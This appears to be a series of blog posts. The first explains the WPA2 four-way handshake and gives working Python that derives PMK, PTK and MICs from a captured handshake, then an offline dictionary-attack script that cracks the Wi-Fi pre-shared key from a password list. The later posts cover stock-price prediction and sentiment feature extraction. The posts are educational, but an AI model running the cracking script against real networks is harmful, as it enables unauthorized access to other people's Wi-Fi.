After the station receives the first message, it generates its own nonce, referred to as the SNonce. The station, assuming it knows the PMK, then has enough information to generate the PTK. The PTK is computed as follows:

#Used for computing HMAC import hmac #Used to convert from hex to binary from binascii import a2b_hex, b2a_hex #Used for computing PMK from hashlib import pbkdf2_hmac, sha1, md5 #Pseudo-random function for generation of #the pairwise transient key (PTK) #key: The PMK #A: b'Pairwise key expansion' #B: The apMac, cliMac, aNonce, and sNonce concatenated # like mac1 mac2 nonce1 nonce2 # such that mac1 < mac2 and nonce1 < nonce2 #return: The ptk def PRF(key, A, B): #Number of bytes in the PTK nByte = 64 i = 0 R = b'' #Each iteration produces 160-bit value and 512 bits are required while(i <= ((nByte * 8 + 159) / 160)): hmacsha1 = hmac.new(key, A + chr(0x00).encode() + B + chr(i).encode(), sha1) R = R + hmacsha1.digest() i += 1 return R[0:nByte] #Make parameters for the generation of the PTK #aNonce: The aNonce from the 4-way handshake #sNonce: The sNonce from the 4-way handshake #apMac: The MAC address of the access point #cliMac: The MAC address of the client #return: (A, B) where A and B are parameters # for the generation of the PTK def MakeAB(aNonce, sNonce, apMac, cliMac): A = b"Pairwise key expansion" B = min(apMac, cliMac) + max(apMac, cliMac) + min(aNonce, sNonce) + max(aNonce, sNonce) return (A, B) #Compute the 1st message integrity check for a WPA 4-way handshake #pwd: The password to test #ssid: The ssid of the AP #A: b'Pairwise key expansion' #B: The apMac, cliMac, aNonce, and sNonce concatenated # like mac1 mac2 nonce1 nonce2 # such that mac1 < mac2 and nonce1 < nonce2 #data: A list of 802.1x frames with the MIC field zeroed #return: (x, y, z) where x is the mic, y is the PTK, and z is the PMK def MakeMIC(pwd, ssid, A, B, data, wpa = False): #Create the pairwise master key using 4096 iterations of hmac-sha1 #to generate a 32 byte value pmk = pbkdf2_hmac('sha1', pwd.encode('ascii'), ssid.encode('ascii'), 4096, 32) #Make the pairwise transient key (PTK) ptk = PRF(pmk, A, B) #WPA uses md5 to compute the MIC while WPA2 uses sha1 hmacFunc = md5 if wpa else sha1 #Create the MICs using HMAC-SHA1 of data and return all computed values mics = [hmac.new(ptk[0:16], i, hmacFunc).digest() for i in data] return (mics, ptk, pmk)

**Note:** The above code assumes that the PMK is computed based on a *pre-shared key* (PSK). This is known as WPA2-PSK and is common for home Wi-Fi networks. In WPA2-PSK, the PMK is computed using PBKDF2 and HMAC-SHA1 as seen in the above code.

In the second message, the station responds to the access point. Two key components of the second message are the 256-bit SNonce that was computed earlier and the 128-bit message integrity check (MIC). The SNonce is the last piece of information the access point needs to compute the PTK. The MIC verifies both that the station knows the PTK, and thus also the PMK. The SNonce field is highlighted below in Figure 5.

**Figure 5: SNonce Field**

The ANonce and SNonce are randomly generated numbers to prevent *replay attacks*: an attack in which an attacker attempts to authenticate using a previously captured packet. From above it can be seen that the PTK depends upon the ANonce and SNonce, and thus it differs from connection to connection; a technique which thwarts replay attacks.

Notice, however, that up to this point authentication has not yet been performed; neither side has verified if the other actually knows the PMK. This is the task of the WPA Key MIC field, seen below in Figure 6.

**Figure 6: WPA Key MIC 1**

The WPA Key MIC field is computed by taking all of the 802.1x fields and computing an HMAC of them. When the computation is performed, the MIC field itself is set to all zeros. **Note:** For WPA the Pseudo-Random Function (PRF) that is used is **MD5** while for WPA2 the **SHA1** algorithm is used. Figure 7 below shows the data to be used highlighted in Wireshark. Since MD5 produces a 128-bit value and SHA1 produces a 160-bit value, only the first 128-bits are preserved of the digest. This can be accomplished by discarding the last 8 hex values.

**Figure 7: Data Section of WPA2 EAPOL Packet 2**

As can be seen from above, the MIC can only be computed if the PTK, and thus the PMK, is known. By defining the MIC in this way, each side can verify the other knows the PMK without ever transmitting the PMK. A 3rd party that is witness to the 4-way handshake still cannot determine the PMK or PTK.

The third packet of the 4-way handshake is similar in spirit to that of the second. Notice in Figure 8 below that it also contains a WPA Key MIC and WPA Key Data field. The MIC field will serve to authenticate the access point to the station. Upon verification of the MIC, the station knows that the access point is in possession of the PTK and thus the PMK. It is assumed that only the genuine access point knows the PMK and thus the authenticity of the access point is confirmed. The method for computing the second MIC is the same as the first.

**Figure 8: WPA Key MIC 2**

The third packet of the 4-way handshake also contains the group temporal key (GTK) which is used to encrypt and decrypt all broadcast data transmissions between the access point and its clients. The GTK is encrypted inside the WPA Key Data field of the third packet.

The final packet of the 4-Way Handshake is an acknowledgement to the access point that the station has received the appropriate keys and encrypted communication will begin. The forth packet also contains a MIC field which is computed in the same way as the previous MICs.

Using the above python code, the PTK, PMK, and MICs are computed for the given packet capture. The following python code initializes variables containing the fields extracted from the packet capture. Then the MICS, PTK, and PMK are computed. Finally the PTK and PMK are displayed and the computed MICs are compared to the actual MICs.

#Run a brief test showing the computation of the PTK, PMK, and MICS #for a 4-way handshake def RunTest(): #the pre-shared key (PSK) psk = "12345678" #ssid name ssid = "Harkonen" #ANonce aNonce = a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055') #SNonce sNonce = a2b_hex("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570") #Authenticator MAC (AP) apMac = a2b_hex("00146c7e4080") #Station address: MAC of client cliMac = a2b_hex("001346fe320c") #The first MIC mic1 = "d5355382b8a9b806dcaf99cdaf564eb6" #The entire 802.1x frame of the second handshake message with the MIC field set to all zeros data1 = a2b_hex("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100") #The second MIC mic2 = "1e228672d2dee930714f688c5746028d" #The entire 802.1x frame of the third handshake message with the MIC field set to all zeros data2 = a2b_hex("010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f") #The third MIC mic3 = "9dc81ca6c4c729648de7f00b436335c8" #The entire 802.1x frame of the forth handshake message with the MIC field set to all zeros data3 = a2b_hex("0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") #Create parameters for the creation of the PTK, PMK, and MICs A, B = MakeAB(aNonce, sNonce, apMac, cliMac) #Generate the MICs, the PTK, and the PMK mics, ptk, pmk = MakeMIC(psk, ssid, A, B, [data1, data2, data3]) #Display the pairwise master key (PMK) pmkStr = b2a_hex(pmk).decode().upper() print("pmk:\t\t" + pmkStr + '\n') #Display the pairwise transient key (PTK) ptkStr = b2a_hex(ptk).decode().upper() print("ptk:\t\t" + ptkStr + '\n') #Display the desired MIC1 and compare to target MIC1 mic1Str = mic1.upper() print("desired mic:\t" + mic1Str) #Take the first 128-bits of the 160-bit SHA1 hash micStr = b2a_hex(mics[0]).decode().upper()[:-8] print("actual mic:\t" + micStr) print('MATCH\n' if micStr == mic1Str else 'MISMATCH\n') #Display the desired MIC2 and compare to target MIC2 mic2Str = mic2.upper() print("desired mic:\t" + mic2Str) #Take the first 128-bits of the 160-bit SHA1 hash micStr = b2a_hex(mics[1]).decode().upper()[:-8] print("actual mic:\t" + micStr) print('MATCH\n' if micStr == mic2Str else 'MISMATCH\n') #Display the desired MIC3 and compare to target MIC3 mic3Str = mic3.upper() print("desired mic:\t" + mic3Str) #Take the first 128-bits of the 160-bit SHA1 hash micStr = b2a_hex(mics[2]).decode().upper()[:-8] print("actual mic:\t" + micStr) print('MATCH\n' if micStr == mic3Str else 'MISMATCH\n') return

The output for the above code is shown in the following code block.

pmk: EE51883793A6F68E9615FE73C80A3AA6F2DD0EA537BCE627B929183CC6E57925 ptk: EA0E404633C802450302868CCAA749DE5CBA5ABCB267E2DE1D5E21E57ACCD5079B31E9FF220E132AE4F6ED9EF1ACC88545825FC32EE55961395AE43734D6C107 desired mic: D5355382B8A9B806DCAF99CDAF564EB6 actual mic: D5355382B8A9B806DCAF99CDAF564EB6 MATCH desired mic: 1E228672D2DEE930714F688C5746028D actual mic: 1E228672D2DEE930714F688C5746028D MATCH desired mic: 9DC81CA6C4C729648DE7F00B436335C8 actual mic: 9DC81CA6C4C729648DE7F00B436335C8 MATCH

Notice that since the MICs match, the provided PSK is correct. If the PSK is instead changed to “abcdefgh”, notice that the MICs no longer match.

pmk: EBB5D703F8834A08D61A67A982FA009E08F747DD65D82C240169E604218B3ACF ptk: 63E412CE67759BD5CEBD0F5B5A487CA155ADD51D771293E31C05BF05A3A98BCFE645F29203956E34C6A5B0CC2186B1161F643807349576CDB2FB1C158B03648F desired mic: D5355382B8A9B806DCAF99CDAF564EB6 actual mic: C2EE0E125962261C897A05E33B579F5C MISMATCH desired mic: 1E228672D2DEE930714F688C5746028D actual mic: 6D60808DE292A32BAE1D381B3D295B2F MISMATCH desired mic: 9DC81CA6C4C729648DE7F00B436335C8 actual mic: D5F07A0FBC8F376541D46591FDA74470 MISMATCH

In this way, the PSK can be guessed and the corresponding MICs created until a match is found. This type of attack is known as an offline *dictionary attack*. The following python code will read a file passwd.txt containing one PSK per line and will test each one until the list is exhausted or until a password is found.

#Tests a list of passwords; if the correct one is found it #prints it to the screen and returns it #S: A list of passwords to test #ssid: The ssid of the AP #aNonce: The ANonce as a byte array #sNonce: The SNonce as a byte array #apMac: The AP's MAC address #cliMac: The MAC address of the client (aka station) #data: The 802.1x frame of the second message with the MIC field zeroed #data2: The 802.1x frame of the third message with the MIC field zeroed #data3: The 802.1x frame of the forth message with the MIC field zeroed #targMic: The MIC for message 2 #targMic2: The MIC for message 3 #targMic3: The MIC for message 4 def TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data, data2, data3, targMic, targMic2, targMic3): #Pre-computed values A, B = MakeAB(aNonce, sNonce, apMac, cliMac) #Loop over each password and test each one for i in S: mic, _, _ = MakeMIC(i, ssid, A, B, [data]) v = b2a_hex(mic[0]).decode()[:-8] #First MIC doesn't match if(v != targMic): continue #First MIC matched... Try second mic2, _, _ = MakeMIC(i, ssid, A, B, [data2]) v2 = b2a_hex(mic2[0]).decode()[:-8] if(v2 != targMic2): continue #First 2 match... Try last mic3, _, _ = MakeMIC(i, ssid, A, B, [data3]) v3 = b2a_hex(mic3[0]).decode()[:-8] if(v3 != targMic3): continue #All of them match print('!!!Password Found!!!') print('Desired MIC1:\t\t' + targMic) print('Computed MIC1:\t\t' + v) print('\nDesired MIC2:\t\t' + targMic2) print('Computed MIC2:\t\t' + v2) print('\nDesired MIC2:\t\t' + targMic3) print('Computed MIC2:\t\t' + v3) print('Password:\t\t' + i) return i return None if __name__ == "__main__": RunTest() #Read a file of passwords containing #passwords separated by a newline with open('passwd.txt') as f: S = [] for l in f: S.append(l.strip()) #ssid name ssid = "Harkonen" #ANonce aNonce = a2b_hex('225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055') #SNonce sNonce = a2b_hex("59168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570") #Authenticator MAC (AP) apMac = a2b_hex("00146c7e4080") #Station address: MAC of client cliMac = a2b_hex("001346fe320c") #The first MIC mic1 = "d5355382b8a9b806dcaf99cdaf564eb6" #The entire 802.1x frame of the second handshake message with the MIC field set to all zeros data1 = a2b_hex("0103007502010a0010000000000000000159168bc3a5df18d71efb6423f340088dab9e1ba2bbc58659e07b3764b0de8570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001630140100000fac040100000fac040100000fac020100") #The second MIC mic2 = "1e228672d2dee930714f688c5746028d" #The entire 802.1x frame of the third handshake message with the MIC field set to all zeros data2 = a2b_hex("010300970213ca00100000000000000002225854b0444de3af06d1492b852984f04cf6274c0e3218b8681756864db7a055192eeef7fd968ec80aee3dfb875e8222370000000000000000000000000000000000000000000000000000000000000000383ca9185462eca4ab7ff51cd3a3e6179a8391f5ad824c9e09763794c680902ad3bf0703452fbb7c1f5f1ee9f5bbd388ae559e78d27e6b121f") #The third MIC mic3 = "9dc81ca6c4c729648de7f00b436335c8" #The entire 802.1x frame of the forth handshake message with the MIC field set to all zeros data3 = a2b_hex("0103005f02030a0010000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000") #Run an offline dictionary attack against the access point TestPwds(S, ssid, aNonce, sNonce, apMac, cliMac, data1, data2, data3, mic1, mic2, mic3)

**Note:** Please use the above code responsibly. There are many other tools available to perform such dictionary attacks. The above is provided *only* for educational purposes.

]]>

**Note: **See a later postÂ Visualizing Neural Network Performance on High-Dimensional Data for code to help visualize neural network learning and performance.

The latest stock data for Yahoo can be found at the following link. Instead of using LibreOffice to parse the date strings, the *datetime* library in Python can be used instead. The strptime function parses dates given a special *format string*. The format string in the code below specifies the dates are of the format yyyy-mm-dd, also known as ISO 8601 format.

Code to load the spreadsheet and parse the dates follows.

#Used for numpy arrays import numpy as np #Used to read data from CSV file import pandas as pd #Used to convert date string to numerical value from datetime import datetime, timedelta #Used to plot data import matplotlib.pyplot as mpl #Load data from the CSV file. Note: Some systems are unable #to give timestamps for dates before 1970. This function may #fail on such systems. # #path: The path to the file #return: A data frame with the parsed timestamps def ParseData(path): #Read the csv file into a dataframe df = pd.read_csv(path) #Get the date strings from the date column dateStr = df['Date'].values D = np.zeros(dateStr.shape) #Convert all date strings to a numeric value for i, j in enumerate(dateStr): #Date strings are of the form year-month-day D[i] = datetime.strptime(j, '%Y-%m-%d').timestamp() #Add the newly parsed column to the dataframe df['Timestamp'] = D #Remove any unused columns (axis = 1 specifies fields are columns) return df.drop('Date', axis = 1)

**Note:** A quick plot of the data reveals that there seems to be a typo in the Feb 01, 2016 data row with the “Low” value listed as 2016.02. The *pyplot* module of the library matplotlib provides powerful tools for visualizing data sets. Plotting a data set is useful for visualizing a data set as well as for catching outliers and typos. The erroneous data point can be removed entirely or modified to a reasonable value as desired. The following code will plot the stock data, set the x-axis labels, and add a legend.

#Given dataframe from ParseData #plot it to the screen # #df: Dataframe returned from #p: The position of the predicted data points def PlotData(df, p = None): if(p is None): p = np.array([]) #p contains the indices of predicted data; the rest are actual points c = np.array([i for i in range(df.shape[0]) if i not in p]) #Timestamp data ts = df.Timestamp.values #Number of x tick marks nTicks= 10 #Left most x value s = np.min(ts) #Right most x value e = np.max(ts) #Total range of x values r = e - s #Add some buffer on both sides s -= r / 5 e += r / 5 #These will be the tick locations on the x axis tickMarks = np.arange(s, e, (e - s) / nTicks) #Convert timestamps to strings strTs = [datetime.fromtimestamp(i).strftime('%m-%d-%y') for i in tickMarks] mpl.figure() #Plots of the high and low values for the day mpl.plot(ts, df.High.values, color = '#7092A8', linewidth = 1.618, label = 'Actual') #Predicted data was also provided if(len(p) > 0): mpl.plot(ts[p], df.High.values[p], color = '#6F6F6F', linewidth = 1.618, label = 'Predicted') #Set the tick marks mpl.xticks(tickMarks, strTs, rotation='vertical') #Add the label in the upper left mpl.legend(loc = 'upper left') mpl.show()

A plot of the data set produced by the above code is shown below in Figure 1.

**Figure 1: Historical Yahoo Inc Stock Data**

In the previous post, only the numericized date was used as input to the regression model. It is dubious that the date provides much useful information about the stock price of a company. To improve the model, more of the information from the spreadsheet is used. A sample is constructed as the current timestamp together with the past days of the opening value, closing value, high value, low value, adjusted closing value, volume, and previous timestamp. Thus, if data for the past days is use, the data matrix contains features. If the previous data is unavailable, the oldest available value will be used instead.

The corresponding target values are the stock opening value, closing value, high value, low value, adjusted closing value, and volume fields. The timestamp obviously does not need to be predicted.

A python class is constructed which takes the number of days and a regression model providing the Scikit-learn interface as arguments. The class then uses the *Learn* function to learn a dataframe returned from the *ParseData* function. Next, the stock values can be predicted for a range of dates using the *PredictDate* function. Source code follows.

#Gives a list of timestamps from the start date to the end date # #startDate: The start date as a string xxxx-xx-xx #endDate: The end date as a string year-month-day #weekends: True if weekends should be included; false otherwise #return: A numpy array of timestamps def DateRange(startDate, endDate, weekends = False): #The start and end date sd = datetime.strptime(startDate, '%Y-%m-%d') ed = datetime.strptime(endDate, '%Y-%m-%d') #Invalid start and end dates if(sd > ed): raise ValueError("The start date cannot be later than the end date.") #One day day = timedelta(1) #The final list of timestamp data dates = [] cd = sd while(cd <= ed): #If weekdays are included or it's a weekday append the current ts if(weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)): dates.append(cd.timestamp()) #Onto the next day cd = cd + day return np.array(dates) #Given a date, returns the previous day # #startDate: The start date as a datetime object #weekends: True if weekends should counted; false otherwise def DatePrevDay(startDate, weekends = False): #One day day = timedelta(1) cd = datetime.fromtimestamp(startDate) while(True): cd = cd - day if(weekends or (cd.date().weekday() != 5 and cd.date().weekday() != 6)): return cd.timestamp() #Should never happen return None #A class that predicts stock prices based on historical stock data class StockPredictor: #The (scaled) data frame D = None #Unscaled timestamp data DTS = None #The data matrix A = None #Target value matrix y = None #Corresponding columns for target values targCols = None #Number of previous days of data to use npd = 1 #The regressor model R = None #Object to scale input data S = None #Constructor #nPrevDays: The number of past days to include # in a sample. #rmodel: The regressor model to use (sklearn) #nPastDays: The number of past days in each feature #scaler: The scaler object used to scale the data (sklearn) def __init__(self, rmodel, nPastDays = 1, scaler = StandardScaler()): self.npd = nPastDays self.R = rmodel self.S = scaler #Extracts features from stock market data # #D: A dataframe from ParseData #ret: The data matrix of samples def _ExtractFeat(self, D): #One row per day of stock data m = D.shape[0] #Open, High, Low, and Close for past n days + timestamp and volume n = self._GetNumFeatures() B = np.zeros([m, n]) #Preserve order of spreadsheet for i in range(m - 1, -1, -1): self._GetSample(B[i], i, D) #Return the internal numpy array return B #Extracts the target values from stock market data # #D: A dataframe from ParseData #ret: The data matrix of targets and the def _ExtractTarg(self, D): #Timestamp column is not predicted tmp = D.drop('Timestamp', axis = 1) #Return the internal numpy array return tmp.values, tmp.columns #Get the number of features in the data matrix # #n: The number of previous days to include # self.npd is used if n is None #ret: The number of features in the data matrix def _GetNumFeatures(self, n = None): if(n is None): n = self.npd return n * 7 + 1 #Get the sample for a specific row in the dataframe. #A sample consists of the current timestamp and the data from #the past n rows of the dataframe # #r: The array to fill with data #i: The index of the row for which to build a sample #df: The dataframe to use #return; r def _GetSample(self, r, i, df): #First value is the timestamp r[0] = df['Timestamp'].values[i] #The number of columns in df n = df.shape[1] #The last valid index lim = df.shape[0] #Each sample contains the past n days of stock data; for non-existing data #repeat last available sample #Format of row: #Timestamp Volume Open[i] High[i] ... Open[i-1] High[i-1]... etc for j in range(0, self.npd): #Subsequent rows contain older data in the spreadsheet ind = i + j + 1 #If there is no older data, duplicate the oldest available values if(ind >= lim): ind = lim - 1 #Add all columns from row[ind] for k, c in enumerate(df.columns): #+ 1 is needed as timestamp is at index 0 r[k + 1 + n * j] = df[c].values[ind] return r #Attempts to learn the stock market data #given a dataframe taken from ParseData # #D: A dataframe from ParseData def Learn(self, D): #Keep track of the currently learned data self.D = D.copy() #Keep track of old timestamps for indexing self.DTS = np.copy(D.Timestamp.values) #Scale the data self.D[self.D.columns] = self.S.fit_transform(self.D) #Get features from the data frame self.A = self._ExtractFeat(self.D) #Get the target values and their corresponding column names self.y, self.targCols = self._ExtractTarg(self.D) #Create the regressor model and fit it self.R.fit(self.A, self.y) #Predict the stock price during a specified time # #startDate: The start date as a string in yyyy-mm-dd format #endDate: The end date as a string yyyy-mm-dd format #return: A dataframe containing the predictions or def PredictDate(self, startDate, endDate): #Create the range of timestamps and reverse them ts = DateRange(startDate, endDate)[::-1] m = ts.shape[0] #Prediction is based on data prior to start date #Get timestamp of previous day prevts = DatePrevDay(ts[-1]) #Test if there is enough data to continue try: ind = np.where(self.DTS == prevts)[0][0] except IndexError: return None #There is enough data to perform prediction; allocate new data frame P = pd.DataFrame(np.zeros([m, self.D.shape[1]]), index = range(m), columns = self.D.columns) #Add in the timestamp column so that it can be scaled properly P['Timestamp'] = ts #Scale the timestamp (other fields are 0) P[P.columns] = self.S.transform(P) #B is to be the data matrix of features B = np.zeros([1, self._GetNumFeatures()]) #Add extra last entries for past existing data for i in range(self.npd): #If the current index does not exist, repeat the last valid data curInd = ind + i if(curInd >= self.D.shape[0]): curInd = curInd - 1 #Copy over the past data (already scaled) P.loc[m + i] = self.D.loc[curInd] #Loop until end date is reached for i in range(m - 1, -1, -1): #Create one sample self._GetSample(B[0], i, P) #Predict the row of the dataframe and save it pred = self.R.predict(B).ravel() #Fill in the remaining fields into the respective columns for j, k in zip(self.targCols, pred): P.set_value(i, j, k) #Discard extra rows needed for prediction P = P[0:m] #Scale the dataframe back to the original range P[P.columns] = self.S.inverse_transform(P) return P

The basic idea of the above code is as follows: use the data from today and the past days ( total) to predict the stock data tomorrow. The *PredictDate* function, can then repeat this process indefinitely into the future by basing subsequent predictions on predicted data. It is reasonable to assume that the subsequent predictions are increasingly unreliable.

With the above class in place, the MLPR class and others are used to make stock predictions for Yahoo Inc. Data is loaded from the csv file, prediction is made for a user specified range of dates, and the results are plotted. Sample main code is as follows:

#Grab the data frame D = ParseData('yahoostock.csv') #The number of previous days of data used #when making a prediction numPastDays = 16 #Number of neurons in the input layer i = numPastDays * 7 + 1 #Number of neurons in the output layer o = D.shape[1] - 1 #Number of neurons in the hidden layers h = int((i + o) / 2) #The list of layer sizes layers = [i, h, h, h, h, h, o] R = MLPR(layers, maxItr = 1000, tol = 0.40, reg = 0.001, verbose = True) sp = StockPredictor(R, nPastDays = numPastDays) #Learn the dataset and then display performance statistics sp.Learn(D) sp.TestPerformance() #Perform prediction for a specified date range P = sp.PredictDate('2016-11-02', '2016-12-31') #Keep track of number of predicted results for plot n = P.shape[0] #Append the predicted results to the actual results D = P.append(D) #Predicted results are the first n rows PlotData(D, range(n + 1))

In addition to the MLPR class from a previous post, the *StockPredictor* class works with any class that provides the basic sklearn interface: *fit*, *predict*, and *score*. A python program which provides a basic command line interface for the primary functionality of this class can be found here.

Next, the program is employed to predict the stock data for Yahoo Inc from November 2nd to December 31st 2016. A KNeighborsRegressor class from sklearn was provided to the *StockPredictor* constructor to produce the prediction shown in Figure 2.

**Figure 2: Yahoo Inc Stock Data with Prediction from KNN**

Finally, the MLPR class from the previous post is used to perform prediction. The results can be seen below in Figure 3.

**Figure 3: Yahoo Inc Stock Data with Prediction from MLPR**

It appears the artificial neural network does not have much faith in Yahoo Inc.

The *StockPredictor* class above takes a slightly less naive approach to stock prediction than that from the previous post. In future posts, I hope to combine sentiment analysis techniques with textual data sets with stock data to make a more reasonable model. I hope to see you then.

N

]]>

In data science and machine learning, there is often difficulty in extracting useful features from raw data. Textual data presents an interesting challenge in this regards, especially due to its abundance on the internet. Because of its complexity, natural language is often not directly suited to training a classifier or regressor model. The following section discusses several simple ways to extract useful features from raw text. The dataset containing the raw text that will be used can be found here.

The dataset consists of sentences gathered from Imbd, Amazon, and Yelp reviews. Each sentence is associated with a sentiment score: 0 if it is a negative sentence, and 1 if it is positive. For simplicity, the three files are first combined into a single file. This can be accomplished using a linux simple command:

*cat imdb_labelled.txt amazon_cells_labelled.txt yelp_labelled.txt > comb.txt*.

A basic function to parse the data is shown in the following block:

#Read sentiment labeled sentences from the specified path #path: The path to the file containing sentiment labeled text data #return: A tuple (S, y) where S is an array of sentences and y is an # array of target values. def LoadData(path): #File format is <text>\t<sentiment score> #Parse accordingly S = [] y = [] #Open file and loop over it line by line with open(path) as f: for l in f: text, sent = l.split('\t') #Strip any non-ascii characters text = StripNonAscii(text) #Parse sentiment score sent = float(sent) #Append results S.append(text) y.append(sent) return (S, y)

With the data parsed, the next step is to extract numeric features from it. A simple yet effective way of accomplishing this is to make a vector of word frequencies. The concept of a frequency vector is like that of a histogram or word cloud.

**Figure 1: Word Frequency Histogram**

In a frequency vector, each component corresponds to the number of times a given word occurs in the corpus. A histogram where each bin contains a single word in the vocabulary is a visual representation of this concept.

Another popular diagram that is related to these concepts is the word cloud. The word cloud plots words with their font size determined by the frequency of their occurance. An example word cloud created from the above dataset is shown below in Figure 2.

**Figure 2: Word Cloud of the Dataset**

Computing a matrix of word frequencies can be easily accomplished with Scikit-learn using the *CountVectorizer* class. The constructor takes many arguments, but useful default are provided for all but one. Some interesting arguments to notes are:

**input:**A file, filename, or sequence of string-like objects.**ngram_range:**The range of*ngram** sizes to include.**stop_words:**Words that will be ignored (like ‘a’).**max_df:**Any word occuring more frequently than this number is discarded.**min_df:**Any word occuring less frequently than this number is discarded.**max_features:**The maximum number of terms that will be maintained.**vocabulary:**Explicitly provide a list of words to count and ignore others.

***Note:** An *ngram* is a sequence of contiguous words like “the phone” or “favorite movie.” The use of ngrams will be explored in a later blog post.

To extract the features with our code so far, the following three lines suffice:

S, y = LoadData('/path/to/directory/comb.txt') cv = CountVectorizer() A = cv.fit_transform(S) #Example use of cv

The following code prints to the screen the top 32 words among all sentences along with the number of their occurances:

V = np.sum(cv.fit_transform(S).toarray(), axis = 0) D = list(zip(V, cv.get_feature_names(), range(V.shape[0]))) for freq, word, c in sorted(D, key = lambda t : t[0], reverse = True)[0:32]: print('{:5d}'.format(c) + '{:5d}'.format(freq) + '\t' + word)

An inspection of Table 1 below reveals that the most commonly occuring features do not offer much useful information about the data. The goal is to assign a sentence a sentiment value, but the above words can be reasonably expected to occur both in positive and negative sentences. Their frequency is simply due to the semantics of the English language.

Number | Frequency | Word |
---|---|---|

1 | 1953 | the |

2 | 1138 | and |

3 | 789 | it |

4 | 754 | is |

5 | 670 | to |

**Table 1: Top 5 Words by Frequency**

There are several ways to get around this problem. The most direct approach is to compile a list of *stop words*, or words to ignore. Thankfully, Scikit-learn has already implemented this. Simply specify *stop_words=’english’* in the CountVectorizer constructor. Table 2 below shows the updated results.

Number | Frequency | Word |
---|---|---|

1 | 230 | good |

2 | 210 | great |

3 | 182 | movie |

4 | 168 | phone |

5 | 163 | film |

**Table 2: Top 5 Words by Frequency with Stop Words**

The above list looks better, but it could be better; “movie”, “phone”, and “film” are most likely not the best words for determining the sentiment of a sentence. As seen above, Scikit-learn offers the ability to supply a custom vocabulary. Intuitively speaking, words with positive and negative connotations like “great”, “horrible”, and “love” ought to be of highest importance as a features.

To explore this further, consider the dimensionality transform provided by linear discriminant analysis. By modeling positive sentiment and negative sentiment as classes, a linear transform which maximizes the between-class variance relative to the within-class variance is constructed. Since there are only two classes in this case, the transform matrix reduces the -dimensional features to -dimensional features and thus will be of dimension . The components of largest magnitude in this matrix will thus be the directions that most greatly influence the sentiment score. Code to view the top components is as follows:

cv = CountVectorizer(stop_words = 'english', max_features=256) D = cv.fit_transform(S) lda = LinearDiscriminantAnalysis() lda.fit(D.toarray(), y) m = 40 topmfeats = np.abs(lda.coef_[0]).argsort()[-m:][::-1] for i, j in enumerate(topmfeats): s = '{:4d}'.format(i) + "\t" s += '{:16s}'.format(cv.get_feature_names()[j]) s += '{:+5.3f}'.format(lda.coef_[0][j]) print(s)

The results are shown below in Table 3.

Index | Word | Coefficient |
---|---|---|

0 | perfect | +3.458 |

1 | fantastic | +3.448 |

2 | delicious | +3.432 |

3 | awesome | +3.400 |

4 | beautiful | +3.287 |

5 | enjoyed | +3.165 |

6 | disappointing | -3.107 |

7 | liked | +3.063 |

**Table 3: Top Words by LDA Coefficient Magnitude**

When considering the sources of the data (Imdb, Amazon, and Yelp), the above results confirm intuition. The sentiment rating is largely influence by words with strongly negative or positive connotations. Further words with positive connotations influence the result in a positive direction (towards ) while words with negative connotations influence the result in a negative direction (towards ).

Next, a classifier is trained and results are generated. First, the raw frequencies will be used with a stock logistic regression model. Sample code and results follow.

#Prints testing accuracy results to the screen #C: The classifier to use #F: The feature extractor to use #S: The list of sentences #y: The target vectors def RunCVTest(C, F, S, y): #Fix the random state for better comparison kf = KFold(len(S), shuffle = True, random_state = 32) for trn, tst in kf: #Make sure to only train with the training data #in a realistic scenario only training data is available at the #feature extraction stage F.fit(S[trn]) B = F.transform(S) #Fit the classifier C C.fit(B[trn], y[trn]) #Results for cross-validation set r1 = C.score(B[tst], y[tst]) #Results for training data r2 = C.score(B[trn], y[trn]) #Both results combined r3 = C.score(B, y) s = 'Tst: ' + '{:.4f}'.format(r1) s += '\tTrn: ' + '{:.4f}'.format(r2) s += '\tAll: ' + '{:.4f}'.format(r3) print(s) #... #%% A first attempt S, y = LoadData(DATA_PATH + 'comb.txt') cv = CountVectorizer() lr = LogisticRegression() #Convert to numpy array for indexing ability S = np.array(S) y = np.array(y) print('LogisticRegression: ') RunCVTestHTML(lr, cv, S, y)

At this point, the results are decent. However, as can be seen from Table 4 below, there is a large discrepancy between the testing and training accuracy scores; the model appears to be over-fitting the training data. This is not overly suprising when the results from Table 1 are considered. If the features contain superfluous information, the model is likely to at least partially fit the superfluous information allowing for high accuracy on the training data but poor generalization ability.

Test | Train | All |
---|---|---|

79.30% | 98.20% | 91.90% |

79.90% | 97.85% | 91.87% |

82.10% | 97.95% | 92.67% |

**Table 4: Logistic Regression Performance Results**

To help reduce the dimensionality of the data, prevent over-fitting, and to slightly improve the results, a custom vocabulary is used. This vocabulary is constructed by using the LDA components of largest magnitude as discussed earlier.

#%% A second attempt with custom vocabulary S, y = LoadData(DATA_PATH + 'comb.txt') cv = CountVectorizer(stop_words = 'english', max_features = 512) D = cv.fit_transform(S) lda = LinearDiscriminantAnalysis() lda.fit(D.toarray(), y) #Determined by exhaustively searching 1 <= m <= 512 m = 213 topmfeats = np.abs(lda.coef_[0]).argsort()[-m:][::-1] voc = [cv.get_feature_names()[i] for i in topmfeats] avgs = RunCVTest(LogisticRegression(), CountVectorizer(vocabulary = voc), S, y)

In the above code, only the first 213 words are preserved. Table 5 contains the updated results from the above code.

Test | Train | All |
---|---|---|

80.50% | 84.40% | 83.10% |

80.10% | 83.90% | 82.63% |

82.50% | 82.75% | 82.67% |

